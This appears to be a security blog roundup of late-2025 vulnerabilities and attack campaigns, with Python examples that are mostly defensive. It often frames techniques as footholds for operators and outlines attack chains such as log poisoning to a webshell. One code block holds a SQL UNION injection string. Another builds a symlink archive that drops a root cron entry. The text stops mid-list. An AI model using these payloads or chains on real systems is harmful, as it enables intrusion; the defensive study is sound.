ZeroDay Field Notes - October-December 2025 Vulnerability and Exploit Highlights

An in-depth analysis of October-December 2025's major cybersecurity events, including pre-auth RCEs, rootkits on network switches, Windows 10's last free patches, and advanced tradecraft with blockchain C2 and AI phishing.

UncleSp1d3r here. October was one of those months where the vulnerability pipeline ran hot and the exploit dev community actually shipped. We got pre-auth RCE chains in enterprise MFT platforms, rootkits on network switches, a final batch of Windows 10 patches that included actively exploited zero-days, and enough SQL injection paths in Ivanti Endpoint Manager to make you wonder if parameterized queries are still a thing. Then December rolled in with React blowing up, Android zero-days under targeted exploitation, and WinRAR's greatest hits being weaponized yet again.

What makes this batch interesting isn't the volume--it's the maturity. We're seeing full-chain PoCs with ROP gadgets and heap grooming, adversary-in-the-middle attacks via compromised network hardware, and blockchain-based C2 that survives domain takedowns. The offensive research coming out of watchTowr, Synacktiv, Doyensec, and ZDI is setting a new bar for public disclosure quality.

Let's dig into what actually moves the tradecraft forward.

Pre-Auth RCE: The October Triple Threat

Oracle E-Business Suite: SSRF to XSLT RCE (CVE-2025-61882)

Oracle's CVE-2025-61882 is a pre-authentication RCE affecting E-Business Suite 12.2.3 through 12.2.14, and it has been actively exploited by the Cl0p ransomware group since at least August. The vulnerability lives in the BI Publisher integration and chains three primitives: SSRF via the UiServlet endpoint, CRLF injection into the server-side request so the attacker controls the headers it carries to internal endpoints, and finally XSLT injection to achieve arbitrary code execution.

watchTowr's teardown walks through the entire chain with HTTP payloads you can use for testing. The SSRF lets you make the server request internal URLs (like http://127.0.0.1/OA_HTML/configurator/), the CRLF injection smuggles attacker-controlled headers past input validation, and the XSLT payload uses Java's ScriptEngineManager to execute arbitrary commands. Cyderes reverse-engineered the exploit components and published hashes and detection logic for hunting. CISA added this to the KEV catalog with a federal remediation deadline.

The patch requires the October 2023 CPU as a prerequisite, which means if you're behind on Oracle updates, you've got a backlog to clear. For operators, the XSLT-to-Java-exec primitive is portable to other apps that accept user-controlled XSLT templates without sandboxing.

WatchGuard Fireware: IKEv2 Pre-Auth Root RCE (CVE-2025-9242)

watchTowr strikes again with a detailed PoC for CVE-2025-9242, a stack buffer overflow in WatchGuard's IKEv2 implementation affecting Fireware OS 11.10.2 through 12.11.3. The bug lives in the handling of overly long Identity (IDi) payloads during VPN negotiation--send more than 100 bytes in the IDi field and you overflow a fixed buffer in the iked daemon.

The writeup includes version fingerprinting techniques, ROP chain construction, and shellcode for gaining root on the appliance. The exploit requires knowledge of the IKEv2 PSK (pre-shared key), but watchTowr notes that many deployments use weak or default credentials. WatchGuard patched this back in September, but the detailed public PoC and GitHub tool mean unpatched firewalls are now trivial targets. CISA confirmed active exploitation and added it to the KEV catalog.

For red teams, this is a perfect perimeter foothold: pre-auth, remotely exploitable, and gives you root on the firewall itself--which means you control routing, can MITM traffic, and pivot to internal networks with impunity.
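To make the bug class concrete, here is an added example (mine, not watchTowr's PoC or WatchGuard's code) in Python. It serializes an IKEv2 Identification payload per RFC 7296 and shows the length check a daemon has to do before copying ID data into a fixed buffer. The 100-byte limit is lifted from the description above and stands in for whatever iked's real buffer size is. One caveat: this models the daemon side. In IKE_AUTH the IDi payload travels inside the encrypted SK payload, so a passive network sensor cannot apply this check without the session keys.

```python
import struct

# IKEv2 Identification payload (RFC 7296 section 3.5). Payload type 35 = IDi, 36 = IDr.
GENERIC_HDR = struct.Struct("!BBH")   # Next Payload, Critical bit + reserved, Payload Length
ID_HDR = struct.Struct("!B3x")        # ID Type, 3 reserved bytes
ID_TYPES = {1: "ID_IPV4_ADDR", 2: "ID_FQDN", 3: "ID_RFC822_ADDR", 5: "ID_IPV6_ADDR",
            9: "ID_DER_ASN1_DN", 10: "ID_DER_ASN1_GN", 11: "ID_KEY_ID"}

# Assumed size of the fixed destination buffer; the write-up says ">100 bytes" overflows it.
ID_DATA_LIMIT = 100


def build_id_payload(id_type: int, id_data: bytes, next_payload: int = 0) -> bytes:
    """Serialize an Identification payload: generic header + ID header + ID data."""
    length = GENERIC_HDR.size + ID_HDR.size + len(id_data)
    if length > 0xFFFF:
        raise ValueError("payload too large for the 16-bit length field")
    return GENERIC_HDR.pack(next_payload, 0, length) + ID_HDR.pack(id_type) + id_data


def parse_id_payload(buf: bytes, limit: int = ID_DATA_LIMIT) -> dict:
    """Parse and validate before anything is copied into a fixed-size buffer.

    Raises ValueError on a truncated header, a length field that disagrees with the
    bytes actually present, or ID data longer than the destination buffer.
    """
    if len(buf) < GENERIC_HDR.size + ID_HDR.size:
        raise ValueError("truncated payload header")
    next_payload, flags, length = GENERIC_HDR.unpack_from(buf, 0)
    if length < GENERIC_HDR.size + ID_HDR.size or length > len(buf):
        raise ValueError(f"bad payload length {length} (have {len(buf)} bytes)")
    (id_type,) = ID_HDR.unpack_from(buf, GENERIC_HDR.size)
    id_data = buf[GENERIC_HDR.size + ID_HDR.size:length]
    if len(id_data) > limit:
        # This is the check whose absence turns a long IDi into a stack overflow.
        raise ValueError(f"ID data is {len(id_data)} bytes, limit {limit}: refusing to copy")
    return {
        "next_payload": next_payload,
        "critical": bool(flags & 0x80),
        "id_type": ID_TYPES.get(id_type, f"unknown({id_type})"),
        "id_data": id_data,
    }


def classify(buf: bytes) -> str:
    """Convenience wrapper: 'ok' or 'rejected: <reason>'."""
    try:
        parse_id_payload(buf)
        return "ok"
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    print(classify(build_id_payload(2, b"vpn.example.test")))   # benign FQDN identity
    print(classify(build_id_payload(11, b"A" * 200)))           # oversized ID_KEY_ID
```

The length-field check matters as much as the size limit: a payload that declares more bytes than are present is a separate read-past-the-end primitive, and a daemon that trusts the declared length will happily walk off the end of the message.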

GoAnywhere MFT: Deserialization to Ransomware (CVE-2025-10035)

The third member of October's RCE trinity is CVE-2025-10035, a Java deserialization flaw in GoAnywhere MFT affecting versions prior to 7.8.4. Microsoft's threat intel group documented active exploitation by Storm-1175, who chained this bug into full Medusa ransomware deployment.

The attack sequence: exploit the public-facing license endpoint (/license) to achieve RCE, drop webshells (JSP backdoors), deploy RATs (SimpleHelp, MeshAgent), move laterally using RDP and credential dumping, exfiltrate data via Rclone to cloud storage, and finally deploy Medusa. Fortra's advisory confirms patches are available. CISA added this one to the KEV catalog too.

The lesson here is that MFT platforms are high-value targets because they sit at the boundary between partner networks and internal infrastructure, often handling sensitive data flows. If you've got GoAnywhere exposed, patch it, restrict access to the admin console, and hunt your logs for the IOCs Microsoft published.

Ivanti Endpoint Manager: A ZDI Disclosure Bonanza

October was rough for Ivanti. ZDI dropped thirteen authenticated SQL injection vulnerabilities in Endpoint Manager, most of which can be chained to remote code execution. The standout advisories:

All of these require authentication, but they share a common pattern: insufficient input validation in report generation and query functions that allows SQL injection, which can be escalated to OS command execution as the service account (typically SYSTEM or a high-privilege database role). Ivanti patched the lot in their October release.

For operators, this is a goldmine if you've already got low-privilege access to an Ivanti console--any authenticated user can leverage these to escalate. The CVSS scores hover around 7.2, but in practice, compromising the endpoint manager means you can push payloads to every managed device in the enterprise. That's a force multiplier.
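Since the whole batch comes down to input concatenated into SQL, here is an added example (mine, not Ivanti's code; the schema and data are constructed) in Python with sqlite3. It puts a report query built by string interpolation next to the same query with bind parameters, shows the interpolated version leaking a second table through UNION, and covers the case bind parameters cannot handle: a user-chosen sort column, which has to go through an allowlist because identifiers cannot be bound.

```python
import sqlite3

# Identifiers cannot be bound as parameters, so sortable columns get an allowlist.
ALLOWED_SORT = {"id", "hostname", "os"}

# Constructed payload: closes the string, appends a UNION over a table the report
# was never meant to touch, and comments out the rest of the statement.
INJECTION = "x' UNION SELECT id, owner, key FROM api_keys --"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for an endpoint-management database (not Ivanti's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE devices(id INTEGER PRIMARY KEY, hostname TEXT, os TEXT);
        CREATE TABLE api_keys(id INTEGER PRIMARY KEY, owner TEXT, key TEXT);
        INSERT INTO devices(hostname, os) VALUES ('ws-01', 'Windows 11'), ('ws-02', 'Windows 10');
        INSERT INTO api_keys(owner, key) VALUES ('svc_epm', 'constructed-secret-key-123');
    """)
    return conn


def device_report_vulnerable(conn, hostname: str, order_by: str = "hostname"):
    """The anti-pattern: both the value and the sort column are interpolated into the statement."""
    sql = (f"SELECT id, hostname, os FROM devices "
           f"WHERE hostname = '{hostname}' ORDER BY {order_by}")
    return conn.execute(sql).fetchall()


def device_report_safe(conn, hostname: str, order_by: str = "hostname"):
    """Values travel as bind parameters; the identifier is checked against a fixed allowlist."""
    if order_by not in ALLOWED_SORT:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    sql = f"SELECT id, hostname, os FROM devices WHERE hostname = ? ORDER BY {order_by}"
    return conn.execute(sql, (hostname,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(device_report_vulnerable(db, INJECTION))   # leaks the api_keys row
    print(device_report_safe(db, INJECTION))         # no device has that hostname: []
```

The vulnerable call returns the api_keys row because the injected UNION has the same column count as the original SELECT; the safe call treats the entire payload as a hostname to compare against and finds nothing. The ORDER BY branch is the part people forget: once you have parameterized the values, the remaining injection surface is whatever identifiers the report builder still splices in.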

Offensive Tooling and Tradecraft Research

Autodesk Revit RFA: From Crash to Full RCE

ZDI's exploit development writeup for CVE-2025-5037 is required reading for anyone interested in modern Windows x64 exploitation. The vulnerability is a type confusion in Revit's RFA (Revit Family Archive) file parser--specifically, how it handles AString deserialization in compressed OLE streams.

The researchers took a trivial crash (type confusion leading to incorrect pointer dereference) and built a reliable RCE exploit using:

  • Monster gadgets (complex ROP sequences that perform multiple operations)
  • Loop weird machines (ROP loops that iterate over attacker-controlled data structures)
  • Genetic algorithm-assisted gadget discovery to find chains that bypass ASLR and DEP

The writeup includes heap grooming techniques, stack pivot primitives, and a full working exploit. They also demonstrated supply-chain implications by backdooring the Axis Communications plugin for Revit, which would auto-update on user machines without any interaction beyond opening a malicious RFA file.

For red teams targeting architecture/engineering firms, this is your vector. RFA files are routinely shared via email and cloud storage, and users open them without hesitation because they're part of the normal workflow.

Linux ksmbd Kernel LPE: Deterministic Heap Grooming (CVE-2025-37947)

Doyensec's three-part series on exploiting CVE-2025-37947--an out-of-bounds write in the Linux kernel's ksmbd SMB server module--is a technical masterpiece. The bug occurs when extended attribute streams are enabled and an attacker sends a crafted SMB request with oversized stream metadata.

The exploit uses msg_msg kernel message spraying for deterministic heap grooming, creates a use-after-free condition, leaks kernel memory to defeat KASLR, and finally builds a ROP chain to execute a privilege escalation payload. The full PoC is on GitHub and targets Ubuntu 22.04 LTS (kernel 5.15.0-153-generic).

For operators, this is your ticket from SMB user to root on Linux boxes running vulnerable kernels. The technique is portable to similar heap allocation patterns in other kernel subsystems, and the writeup's coverage of msg_msg exploitation is a valuable primer.

TrustedSec: Windows Service Trigger Abuse

TrustedSec published research on alternative methods for starting Windows services when you lack SERVICE_START rights on the service and cannot simply issue sc start. The techniques abuse built-in service triggers--named pipes, RPC endpoints, ETW providers, WNF notifications, and firewall events--to activate demand-start and manual-start services like RemoteRegistry, WebClient, and ClipSVC.

For example, you can trigger RemoteRegistry by connecting to its named pipe (\\.\pipe\winreg), which starts the service from an unprivileged context; the registry ACLs still decide what you can read once it is running. Similarly, WebClient can be activated by accessing its RPC endpoint, enabling WebDAV/SMB relay attacks.

The research includes Beacon Object Files (BOFs) in the CS-Situational-Awareness-BOF repo for querying and triggering services, plus examples using native Windows tools (sc qtriggerinfo, rpcping, etc.). For lateral movement and privilege escalation scenarios where you need to activate services stealthily, this is essential reading.

APT Campaigns: AI, Blockchain, and Open-Source Abuse

DPRK Adopts EtherHiding for C2

Mandiant's analysis of UNC5342--a DPRK-linked group--documents their use of EtherHiding, a technique that stores malicious JavaScript payloads in blockchain smart contract data. The campaign targets developers via fake job postings and npm packages, delivering the JADESNOW and INVISIBLEFERRET malware families.

Here's how it works: the initial infection vector is a malicious npm package or GitHub repo disguised as a coding interview or job application. Once executed, the JavaScript loader reads transaction data from the BNB Chain, Ethereum, and other blockchains using public APIs (BscScan, Etherscan). The attacker has pre-uploaded obfuscated payloads to the blockchain as transaction calldata, which the loader retrieves, decrypts (often with simple XOR), and executes in memory.

Because the payload is stored on a public ledger that nobody can edit or delete, the payload store itself cannot be taken down; defenders can only block the lookups (the explorer and RPC endpoints the loader queries), and even with the C2 domains blocked the malware can still fetch its next stage from the chain. The operational cost is minimal--around $1 per transaction--and the resilience is extraordinary. Mandiant published YARA rules and IOCs, but the real takeaway for offense is the C2 primitive: decentralized, tamper-proof, and publicly readable infrastructure.

For a related technique, Ransom-ISAC documented Cross-Chain TxDataHiding, where DPRK operators hide payloads across TRON, Aptos, and BSC and decrypt them at runtime using XOR keys embedded in the loader. The GitHub repo includes detection rules and deobfuscation scripts.

UTA0388: LLM-Powered Spear-Phishing Meets DLL Hijacking

Volexity's APT Meets GPT report introduces UTA0388, a China-aligned group using large language models to scale spear-phishing campaigns. The attackers use LLMs to generate multilingual, contextually aware emails that build rapport with targets over multiple exchanges before delivering malicious attachments.

Once the victim opens a weaponized archive, the payload chain uses DLL search order hijacking (via Tablacus Explorer) to load GOVERSHELL, a custom Golang backdoor with five known variants. The malware persists via scheduled tasks (MyGoTask, SystemHealthMonitor) and supports command execution, polling/beaconing C2, and file operations.

For red teams, the AI-assisted phishing angle is worth exploring--modern LLMs can generate convincing lures at scale, and Volexity's findings suggest that detection based on grammar or phrasing alone is no longer viable. The DLL hijacking and Golang implant are standard but well-executed.

China-Nexus Groups Abuse Nezha RMM for Persistence

Huntress documented a campaign by China-linked actors abusing exposed phpMyAdmin instances for log poisoning to deploy webshells, then using the open-source Nezha remote monitoring tool as a persistence mechanism. The infection chain: from the phpMyAdmin SQL console, turn on MySQL general query logging and point the log file at a .php path under the web root, issue a query containing a PHP webshell so it lands in that file, request the file over HTTP to execute it, use the webshell to download and install the Nezha agent as a Windows service, and finally deploy Ghost RAT for long-term C2.

Nezha is a legitimate infrastructure monitoring tool, which makes it blend in with normal administrative traffic. The C2 communication uses WebSockets over HTTPS, and the dashboard can be hosted on attacker-controlled servers or compromised infrastructure. Over 100 victims have been identified, primarily in the Asia-Pacific region.

For defenders, the IOCs include process lineage (httpd.exe spawning unexpected child processes), the Nezha agent's service and registry artifacts, and network connections to Nezha dashboard IPs. For offense, this demonstrates effective reuse of open-source remote management tools as C2 frameworks--a technique we've seen with AnyDesk, MeshAgent, and others, but Nezha's lightweight agent and cross-platform support make it particularly attractive.

Linux & IoT: Rootkits in the Wild

LinkPro: eBPF Rootkit with Magic Packet Activation

Synacktiv's full analysis of LinkPro is one of the most detailed eBPF rootkit teardowns published this year. The malware was discovered on AWS EKS nodes following exploitation of Jenkins (CVE-2024-23897). It uses eBPF kernel hooks to hide processes, files, and network connections, and it activates via a magic TCP SYN packet (window size 54321).

The persistence mechanism is clever: the rootkit masquerades as a fake systemd service (systemd-resolveld.service--note the typo), and where it cannot load its eBPF programs it falls back to LD_PRELOAD hooks on userspace tools like ps, netstat, and ls to hide its artifacts. The C2 supports shell access, file operations, and SOCKS5 pivoting.

For detection, Synacktiv provides YARA rules and suggests monitoring for unexpected eBPF programs (bpftool prog show), anomalous systemd units, and modifications to /etc/ld.so.preload. For offense, the eBPF stealth techniques and magic-packet activation are worth studying--this is the modern standard for Linux post-exploitation persistence.
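The magic-packet activation is the one piece of this you can hunt for on the wire, so here is an added example (mine, not Synacktiv's tooling) in Python: it parses raw IPv4/TCP headers and flags SYNs whose window size is the 54321 value described above. The sample packets are constructed in the block. Two caveats a hunter should keep in mind: the rootkit hides its own network state from the infected host, so run this on a tap or span-port capture rather than on the suspect box; and a legitimate stack can emit a SYN with that window, so treat a hit as a lead to correlate with what the destination does next, not as proof on its own.

```python
import ipaddress
import struct

MAGIC_WINDOW = 54321          # TCP window size the LinkPro write-up attributes to the knock
TCP_SYN, TCP_ACK = 0x02, 0x10


def build_ipv4_tcp(src: str, dst: str, sport: int, dport: int, flags: int,
                   window: int, seq: int = 0) -> bytes:
    """Construct a minimal IPv4 + TCP packet (no options, zero checksums) for testing."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, window, 0, 0)
    total = 20 + len(tcp)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return ip + tcp


def parse_ipv4_tcp(pkt: bytes):
    """Return (src, dst, sport, dport, flags, window), or None if not IPv4 carrying TCP."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6 or len(pkt) < ihl + 20:      # protocol 6 = TCP, need a full TCP header
        return None
    src = str(ipaddress.IPv4Address(pkt[12:16]))
    dst = str(ipaddress.IPv4Address(pkt[16:20]))
    sport, dport, _seq, _ack, _off, flags, window = struct.unpack_from("!HHIIBBH", pkt, ihl)
    return src, dst, sport, dport, flags, window


def is_magic_syn(pkt: bytes, magic: int = MAGIC_WINDOW) -> bool:
    """A bare SYN (not SYN/ACK) whose advertised window equals the magic value."""
    hdr = parse_ipv4_tcp(pkt)
    if hdr is None:
        return False
    *_, flags, window = hdr
    return bool(flags & TCP_SYN) and not (flags & TCP_ACK) and window == magic


def find_knocks(packets, magic: int = MAGIC_WINDOW):
    """Return (src, dst, dport) for every packet in the capture that matches the knock."""
    hits = []
    for pkt in packets:
        if is_magic_syn(pkt, magic):
            src, dst, _sport, dport, _flags, _window = parse_ipv4_tcp(pkt)
            hits.append((src, dst, dport))
    return hits


if __name__ == "__main__":
    # Constructed traffic: one knock, one ordinary SYN, one SYN/ACK reusing the magic window.
    capture = [
        build_ipv4_tcp("203.0.113.7", "10.0.0.5", 40000, 443, TCP_SYN, MAGIC_WINDOW),
        build_ipv4_tcp("203.0.113.7", "10.0.0.5", 40001, 443, TCP_SYN, 65535),
        build_ipv4_tcp("10.0.0.5", "203.0.113.7", 443, 40000, TCP_SYN | TCP_ACK, MAGIC_WINDOW),
    ]
    print(find_knocks(capture))   # only the first packet
```

To run this over real traffic, strip the link-layer header from each frame (14 bytes for Ethernet) before handing the bytes to find_knocks. Pair any hit with the host-side checks Synacktiv suggests: bpftool prog show, unfamiliar systemd units, and a non-empty /etc/ld.so.preload.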

Cisco Switches Get Rootkitted: Operation Zero Disco (CVE-2025-20352)

Trend Micro documented Operation Zero Disco, a campaign exploiting CVE-2025-20352--an authenticated SNMP stack overflow in Cisco IOS/IOS XE--to deploy fileless rootkits on network switches. Reaching the overflow takes nothing more than a valid SNMPv1/v2c community string (read-only suffices, and default strings are still common) or SNMPv3 credentials; per Cisco's advisory, turning it into code execution rather than a crash additionally requires privilege-15 administrative credentials on the device. Once achieved, it grants full control of the switch.

The attackers deploy ARP spoofing modules, log tampering tools, and MITM proxies directly into the switch's memory. Because the rootkit is fileless and resides in volatile RAM, it survives until reboot--but in production networks, core switches rarely reboot. Cisco published patches in September 2025, but Trend Micro's research confirms active exploitation with SHA256 hashes for hunting.

For operators, owning the network infrastructure is the ultimate pivot point. From a compromised switch, you can intercept credentials, manipulate routing tables, and persist in a place where most EDR and logging tools have zero visibility.

Windows Patch Tuesday: The Last Free Ride for Win10

Microsoft's October 2025 Patch Tuesday was notable for being the final free security update for Windows 10. After October 14, 2025, continued patching requires Extended Security Updates (ESU), which means enterprises still running Win10 need to either migrate or pay up.

The release addressed 172 CVEs, including six zero-days (three actively exploited, three publicly disclosed before the patch). The ones that matter most for Windows operators:

  • CVE-2025-59230: Windows Remote Access Connection Manager (RasMan) EoP (actively exploited, CISA KEV)
  • CVE-2025-24990: Windows Agere Modem Driver (ltmdm64.sys) EoP (actively exploited, PoC available)
  • CVE-2025-24052: A second Agere modem driver EoP, publicly disclosed with a PoC but not reported as exploited

The Agere modem driver bugs are particularly interesting because Microsoft's fix was to simply remove the driver rather than patch the code. The driver supported legacy fax hardware, and removing it broke fax functionality for organizations still using dial-up modems in 2025 (yes, they exist). The exploits involve IOCTL buffer overflows that yield SYSTEM-level code execution from low-privileged contexts. r-tec IT Security and others have published technical details.

For red teams, these are classic local privilege escalation primitives. If you're doing physical assessments or have initial low-privilege access, kernel driver bugs remain a reliable path to full compromise.

Exploitation Primitives & Techniques

7-Zip: Symlink Path Traversal in ZIP Extraction

ZDI disclosed two related bugs in 7-Zip's ZIP file parser involving improper handling of symbolic links. A crafted archive carries a symlink entry whose target resolves outside the extraction directory, followed by regular entries whose paths run through that link, so extraction writes attacker-controlled files to locations like the Windows Startup folder. Both bugs were patched in 7-Zip 25.00.

The exploitation requires user interaction (the victim must extract the archive), but in enterprise environments where users routinely handle compressed files from partners and customers, that's a low bar. The technique works on Windows, macOS, and Linux builds of 7-Zip, with the caveat that on Windows creating a symlink still needs SeCreateSymbolicLinkPrivilege or Developer Mode, so the bar is lowest on Linux and macOS. For operators, this is a useful initial access or persistence primitive when you control file content but not execution context.

Public PoCs surfaced in November, and NHS England issued a warning about active exploitation attempts.
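Here is an added example (mine, not ZDI's PoC or 7-Zip's code) in Python that builds the archive shape described above and then audits it the way a safe extractor should: it flags symlink entries that resolve outside the destination and, crucially, tracks those links so a later entry written through one is caught too. Archive names and the destination directory are constructed. Python's own zipfile.extractall writes symlink entries as plain files rather than creating links, so the audit models what a link-honouring extractor such as 7-Zip does, not what zipfile does.

```python
import io
import posixpath
import stat
import zipfile


def build_symlink_zip(link_name: str, link_target: str, payload_name: str, payload: str) -> bytes:
    """Constructed test archive: a symlink entry, then a file whose path runs through the link."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(link_name)
        info.create_system = 3                          # Unix: extractors honour the mode bits
        info.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(info, link_target)                  # a symlink entry's data is its target
        zf.writestr(payload_name, payload)
    return buf.getvalue()


def is_symlink(info: zipfile.ZipInfo) -> bool:
    """The Unix mode lives in the high 16 bits of external_attr."""
    return stat.S_ISLNK(info.external_attr >> 16)


def audit_zip(data: bytes, dest: str = "/tmp/extract"):
    """List entries a symlink-following extractor would write outside dest.

    Symlinks are recorded in archive order, so an entry whose parent directory is a
    link seen earlier is resolved through that link before the containment check.
    Absolute names and plain ../ traversal are caught by the same check.
    """
    root = posixpath.normpath(dest)
    links = {}
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = posixpath.normpath(info.filename)
            if is_symlink(info):
                target = zf.read(info).decode("utf-8", "replace")
                resolved = posixpath.normpath(posixpath.join(root, posixpath.dirname(name), target))
                links[name] = resolved
                if posixpath.commonpath([root, resolved]) != root:
                    findings.append(f"symlink {info.filename} -> {target} escapes {root}")
                continue
            parts = name.split("/")
            real = posixpath.join(root, name)
            for i in range(1, len(parts)):              # does a parent directory go through a link?
                prefix = "/".join(parts[:i])
                if prefix in links:
                    real = posixpath.join(links[prefix], *parts[i:])
                    break
            real = posixpath.normpath(real)
            if posixpath.commonpath([root, real]) != root:
                findings.append(f"{info.filename} would be written to {real}")
    return findings


if __name__ == "__main__":
    evil = build_symlink_zip("link", "../../../etc", "link/cron.d/evil", "* * * * * root /tmp/x\n")
    for line in audit_zip(evil):
        print(line)
```

The same containment test (resolve, then check that the destination is still a prefix of the real path) is what a fixed extractor applies before every write; the difference between "secure" and "vulnerable" here is only whether the resolution step accounts for links the archive itself created a moment earlier.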

Gladinet CentreStack/Triofox: LFI to ViewState Deserialization RCE

Huntress broke down the exploitation of CVE-2025-11371, an unauthenticated LFI in Gladinet's CentreStack and Triofox file sync platforms. The bug lives in the /storage/t.dn handler, which fails to sanitize file path input. An attacker can request ../ traversal sequences to read arbitrary files under C:\Windows\Temp\glad_temp, including Web.config.

The Web.config file contains the ASP.NET machineKey, which can be used to forge ViewState payloads. By chaining the LFI with CVE-2025-30406 (ViewState deserialization), an attacker achieves unauthenticated remote code execution as SYSTEM. Patches are available (CentreStack 16.10.10408.56683 and updated Triofox builds), and CISA added this to the KEV catalog.

The interim mitigation is to disable the /storage/t.dn handler in Web.config if you can't patch immediately. For operators, this is a textbook example of chaining a seemingly low-impact info leak (LFI) into full RCE by stealing the key that protects a deserialization boundary. The pattern applies broadly to ASP.NET applications that expose machineKey or similar secrets.

Strapi JWT Authentication Bypass (CVE-2025-3930)

CERT Polska disclosed CVE-2025-3930, an authentication bypass in the Strapi headless CMS affecting the v4 and v5 release lines before the fixes listed below. The bug is simple but effective: Strapi's JWT implementation fails to revoke tokens after logout or account deactivation, and the /admin/renew-token endpoint is unauthenticated, allowing indefinite token renewal.

If you can intercept or steal a JWT (via XSS, CSRF, or session hijacking), you can maintain admin access forever--or at least until the server is patched. The default JWT expiration is 30 days, but token renewal resets the clock. Patches are available in Strapi 5.24.2 and 4.25.24.

For red teams, this is a persistence mechanism: once you have a valid JWT, you can renew it programmatically and maintain access even if the user logs out or an admin disables their account. For defenders, the mitigation is server-side token revocation (via a blacklist or database state) and reducing JWT expiration time to hours instead of days.
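To show what that server-side state looks like, here is an added example (mine, not Strapi's code) in Python using only the standard library. It mints HS256 JWTs with a unique jti, keeps a revocation set plus a per-user cut-off timestamp, and makes renewal an authenticated action that burns the token being renewed. The secret, the one-hour lifetime, and the user IDs are constructed for the example; the point is the shape of the state, which carries over to any JWT stack.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

SECRET = b"constructed-demo-secret-not-strapi's"   # assumed HS256 key for this example only
TTL_SECONDS = 3600                                 # hours, not the 30-day default described above


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def issue(user_id: str, now=None, ttl: int = TTL_SECONDS) -> str:
    """Mint an HS256 JWT with a unique jti so individual tokens can be revoked."""
    now = int(time.time()) if now is None else now
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    claims = {"sub": user_id, "iat": now, "exp": now + ttl, "jti": secrets.token_hex(8)}
    body = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


class SessionStore:
    """The server-side state a bare JWT lacks: revoked jtis plus a per-user cut-off,
    so logout kills one token and account deactivation kills all of a user's tokens."""

    def __init__(self):
        self.revoked = set()
        self.user_cutoff = {}   # user_id -> tokens issued at or before this time are dead

    def verify(self, token: str, now=None):
        """Return the claims if the signature, expiry, revocation set and cut-off all pass."""
        now = int(time.time()) if now is None else now
        try:
            header, body, sig = token.split(".")
            expected = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
            if not hmac.compare_digest(b64url_decode(sig), expected):
                return None
            claims = json.loads(b64url_decode(body))
            if claims["exp"] <= now or claims["jti"] in self.revoked:
                return None
            if claims["iat"] <= self.user_cutoff.get(claims["sub"], -1):
                return None
            return claims
        except (ValueError, KeyError, TypeError):
            return None

    def logout(self, token: str, now=None) -> bool:
        claims = self.verify(token, now)
        if claims is None:
            return False
        self.revoked.add(claims["jti"])
        return True

    def deactivate_user(self, user_id: str, now=None):
        """Invalidate every token the user currently holds without enumerating them."""
        self.user_cutoff[user_id] = int(time.time()) if now is None else now

    def renew(self, token: str, now=None):
        """Renewal requires a currently valid token and burns it, so a stolen copy
        cannot be renewed a second time and a logged-out token cannot be revived."""
        claims = self.verify(token, now)
        if claims is None:
            return None
        self.revoked.add(claims["jti"])
        return issue(claims["sub"], now)


if __name__ == "__main__":
    store = SessionStore()
    tok = issue("admin")
    print(store.logout(tok), store.verify(tok) is None, store.renew(tok) is None)   # True True True
```

The revocation set only has to remember jtis until their exp passes, so it stays small when lifetimes are hours; the cut-off map handles the "admin disabled the account" case without a table scan. Both pieces are exactly what a stateless JWT design leaves out, and their absence is the whole bug.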

Android & Mobile Attack Surface

Pixnapping: GPU Side-Channel Steals Pixels (CVE-2025-48561)

Researchers from Carnegie Mellon, UC Berkeley, UC San Diego, and the University of Washington published Pixnapping, a GPU-based side-channel attack on Android 13-16 that allows unprivileged apps to infer and reconstruct screen pixels without requiring any permissions.

The attack exploits Android's GPU compositing pipeline and lossless compression timing. By measuring how long it takes the GPU to compress screen buffers, the app can infer pixel values and reconstruct sensitive content like 2FA OTPs and passwords--even from apps that set FLAG_SECURE to block screenshots.

Google issued a partial patch, but the researchers demonstrated a bypass. The full details and PoC are in the academic paper. For operators, this is a useful primitive for data exfiltration on Android when you have app-level access but can't get screen recording permissions. For defenders, there's no immediate mitigation beyond applying OS updates and hoping for vendor fixes.

Google Patches Two Actively Exploited Android Zero-Days (CVE-2025-48633, CVE-2025-48572)

Google's December 2025 Android Security Bulletin addressed over 100 vulnerabilities, including two zero-days confirmed under targeted exploitation:

  • CVE-2025-48633: Information disclosure in the Android Framework
  • CVE-2025-48572: Privilege escalation in the Android Framework

Both bugs affect Android 13, 14, 15, and 16, and Google confirmed that the exploits are being used in limited, targeted attacks. No technical details or PoCs have been published yet, but the fact that they're being actively exploited in the wild means they're high-value. Patches are available in the 2025-12-05 security patch level.

For operators running mobile assessments, keep an eye out for public PoCs once reverse engineering efforts catch up.

Blockchain and Crypto Tradecraft

Cross-Chain TxDataHiding: DPRK's Multi-Blockchain C2

Ransom-ISAC's deep-dive into Cross-Chain TxDataHiding shows DPRK operators distributing malware via fake GitHub job repos that use TRON, Aptos, and BSC blockchains to fetch obfuscated JavaScript payloads. The technique works like this:

  1. User clones a fake developer job repo or installs a malicious npm package
  2. Loader fetches specific blockchain transactions using public RPC endpoints (e.g., api.trongrid.io, bsc-dataseed.binance.org)
  3. Transaction calldata contains XOR-encrypted JavaScript
